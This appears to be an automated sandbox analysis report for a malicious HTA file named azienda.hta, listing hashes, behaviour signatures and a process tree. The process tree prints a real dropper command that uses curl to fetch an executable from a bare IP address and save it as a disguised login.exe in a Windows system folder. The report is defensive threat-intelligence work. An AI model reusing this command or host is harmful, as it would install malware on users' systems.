Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
01/03/2023, 16:09
Static task
static1
Behavioral task
behavioral1
Sample
azienda.hta
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
azienda.hta
Resource
win10v2004-20230220-en
General
-
Target
azienda.hta
-
Size
7KB
-
MD5
f8bb2a440466e90f9ae60c4e06ee539c
-
SHA1
fe9e57b0245c6fb43a87ecf29bd07aea91d0b270
-
SHA256
7590f4c3928e025b274b13e945cf2896d84b49c812ead01204f2a2303e0a59d3
-
SHA512
82830264dd3891af4ef5cf6af8d2094f70416f5ce323e5ea96ad9d2a2b9bef99d6a4d6a84c9e59a3434c7c51f0b5d349766a5e331a861b43a21714da10bb6260
-
SSDEEP
96:SPLY0B6XNEbJpEl0EJjAr3BZE5S4dwatxC5WLSYLw9RKUzlnoi594N0M+Q0AK/Hn:SjYC6GFpa6r/TC7QuMVnoiD00MC2Kb9
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1324 wrote to memory of 4352 1324 mshta.exe 85 PID 1324 wrote to memory of 4352 1324 mshta.exe 85 PID 1324 wrote to memory of 4352 1324 mshta.exe 85 PID 4352 wrote to memory of 404 4352 cmd.exe 87 PID 4352 wrote to memory of 404 4352 cmd.exe 87 PID 4352 wrote to memory of 404 4352 cmd.exe 87
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://191.101.2.39/installazione.exe -o C:\Windows\\System32\\LogFiles\\login.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\curl.execurl http://191.101.2.39/installazione.exe -o C:\Windows\\System32\\LogFiles\\login.exe3⤵PID:404
-
-